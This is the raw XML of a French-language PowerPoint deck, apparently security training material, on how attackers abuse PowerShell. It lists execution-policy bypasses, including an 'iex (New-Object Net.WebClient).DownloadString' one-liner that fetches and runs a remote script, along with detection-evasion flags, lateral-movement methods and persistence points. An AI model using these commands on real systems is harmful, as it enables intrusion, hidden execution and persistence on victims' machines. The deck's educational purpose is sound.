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338" r:id="rId2"/>
    <p:sldId id="509" r:id="rId3"/>
    <p:sldId id="510" r:id="rId4"/>
    <p:sldId id="511" r:id="rId5"/>
    <p:sldId id="374" r:id="rId6"/>
    <p:sldId id="375" r:id="rId7"/>
    <p:sldId id="376" r:id="rId8"/>
    <p:sldId id="377" r:id="rId9"/>
    <p:sldId id="513" r:id="rId10"/>
    <p:sldId id="423" r:id="rId11"/>
    <p:sldId id="512" r:id="rId12"/>
    <p:sldId id="514" r:id="rId13"/>
    <p:sldId id="515" r:id="rId14"/>
    <p:sldId id="357" r:id="rId15"/>
    <p:sldId id="516" r:id="rId16"/>
    <p:sldId id="517" r:id="rId17"/>
    <p:sldId id="518" r:id="rId18"/>
    <p:sldId id="519" r:id="rId19"/>
    <p:sldId id="5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961" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="5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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Par défaut, Microsoft restreint les scripts PowerShell avec des politiques d'exécution :</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Restricted  / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>AllSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RemoteSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>    / Unrestricted   / Bypass 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b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Bypass offensive :</a:t>
          </a:r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a) TYPE myScript.ps1 | PowerShell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>noprofile</a:t>
          </a:r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 </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="accent3">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p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b) powershell.exe -command “</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>iex</a:t>
          </a:r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(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Net.WebClient</a:t>
          </a:r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).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadString</a:t>
          </a:r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(‘http://[REMOVED]/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>myScript</a:t>
          </a:r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. ps1’)”</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Par défaut, Microsoft restreint les scripts PowerShell avec des politiques d'exécution :</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Restricted  / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>AllSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RemoteSigned</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>    / Unrestricted   / Bypass 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b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Bypass offensive :</a:t>
          </a:r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c) powershell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>enc</a:t>
          </a:r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 [ENCODED COMMAND] </a:t>
          </a:r>
        </a:p>
        <a:p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d) powershell.exe -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>ExecutionPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> bypass -File myScript.ps1 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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>PowerShell accepte une liste drapeaux à ligne de commande. </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Arguments pour échapper à la détection et contourner les restrictions locales : 
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b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NoP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NoProfile</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ignore les commandes du fichier de profil)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Enc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>EncodedCommand</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécute une commande en Base64)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -W </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Hidden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>WindowStyle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Hidden</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(cache la fenêtre de commande) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  
   -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Exec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> bypass/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>ExecutionPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Bypass </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ignore la restriction de la politique d'exécution)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
  -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NonI</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>NonInteractive</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(ne pas exécuter un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> interactif)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -C/-Command </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécute une seule commande)   </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
   -F/-File </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>(exécuter des commandes à partir d'un fichier spécifié) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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 custScaleY="131044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r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Dans les scripts PowerShell malveillants, les commandes et fonctions les plus fréquemment utilisées sur la ligne de commande sont les suivantes : 
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a.(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System.Net.Webclient</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadString</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>()</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> b.(New-Object </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>System.Net.Webclient</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>).</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DownloadFile</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>()</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>c.IEX</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> / -Invoke-Expression</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>d.Start</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>-Process </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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 custScaleY="131044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r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
        </a:p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r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Techniques permettent aux attaquants de se propager dans tout l'environnement d'une entreprise à partir d'un seul ordinateur compromis. 
Différentes méthodes disponibles pour exécuter des commandes PowerShell sur un ordinateur distant </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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 Invoke-Command   </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> Enter-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>PSSession</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> WMI/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>wmic</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>/Invoke-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>WMImethod</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>   </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  Profile injection   </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>  Common tools (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>PsExec</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, Task </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Sheduler</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> )</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
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 custScaleY="131044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endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Les adversaires tentent de rester sur les ordinateurs compromis en créant un point de chargement (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>load</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> point) persistant qui redémarre le </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>backdoor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> lorsque Windows redémarre.
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 Base de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>registres</a:t>
          </a:r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 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Tâches</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>planifiées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
 Dossier de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
